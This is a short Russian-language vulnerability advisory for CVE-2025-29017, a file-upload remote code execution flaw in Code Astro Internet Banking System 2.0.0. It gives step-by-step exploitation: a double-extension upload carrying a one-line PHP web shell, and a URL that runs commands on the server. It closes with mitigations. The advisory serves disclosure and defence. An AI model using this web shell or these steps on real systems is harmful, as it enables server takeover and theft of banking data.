CVE-2025-29017 - Удаленное выполнение кода в Internet Banking System 2.0.0 через загрузку аватара
Описание
Уязвимость удаленного выполнения кода (RCE) существует в Code Astro Internet Banking System 2.0.0 из-за некорректной проверки загрузки файлов в параметре profile_pic в pages_view_client.php. Злоумышленники могут обойти проверки безопасности, изменив запрос загрузки, что приводит к выполнению произвольного кода.
Уязвимый компонент
- Параметр
profile_pic в pages_view_client.php
- Функция загрузки позволяет выполнять вредоносные PHP-файлы
Шаги эксплуатации
- Перейдите в настройки профиля пользователя и выберите новое изображение для аватара.


- Перехватите запрос загрузки аватара с помощью такого инструмента, как Burp Suite.

- Измените файл на двойное расширение (.jpeg.php), измените заголовок Content-Type на application/x-php и добавьте вредоносный PHP-код:
<?php system($_GET['cmd']); ?>


- Вы можете проверить, загружен ли файл, по адресу /admin/dist/img/:
http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt

Воздействие
- Полная компрометация сервера
- Кража данных
- Повышение привилегий
Меры защиты
- Ограничьте загрузку файлов только форматами изображений и проверяйте MIME-типы.
- Очищайте имена файлов и блокируйте файлы, содержащие исполняемый код.
- Храните загруженные файлы вне корневой директории веб-сервера.
Ссылки
- OWASP File Upload Security